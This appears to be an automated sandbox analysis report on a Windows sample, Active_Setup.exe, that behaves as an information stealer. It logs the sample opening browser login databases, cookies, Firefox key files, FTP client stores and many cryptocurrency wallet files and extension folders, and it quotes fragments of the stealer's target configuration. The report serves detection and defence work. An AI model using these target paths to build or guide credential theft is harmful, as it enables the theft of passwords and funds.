Source: C:\Users\user\Desktop\Active_Setup.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_01092AF9
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_01092DBF
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_010933EF
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_010932D8
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_01093487
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_010934FB
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0109378E
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_010937F5
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_0108B6B7
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_010936CD
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_01093831
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: GetLocaleInfoA,0_2_01097C8B
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_01095F9D
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_01095E2A
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_01095E5E
Source: C:\Users\user\Desktop\Active_Setup.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: 0_2_01080A79 GetSystemTimeAsFileTime,__aulldiv,0_2_01080A79
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: 0_2_010905DC __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_010905DC
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: 0_2_00FC37A0 _memset,GetVersionExA,getsockopt,setsockopt,0_2_00FC37A0
Source: C:\Users\user\Desktop\Active_Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1881263103.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Active_Setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: Active_Setup.exe PID: 7532, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520}
Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wad
Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: p-store.json",".finger-print.fp","simple-storage.json","window-state.json"],
Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: lets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\
Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 1520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/E
Source: Active_Setup.exe, 00000000.00000002.1934160913.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *ethereum*
Source: Active_Setup.exe, 00000000.00000003.1860274897.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000004.00000002.1945512728.0000000007550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\Active_Setup.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\Desktop\Active_Setup.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Each of these Documents directories is queried several times over the course of the run.
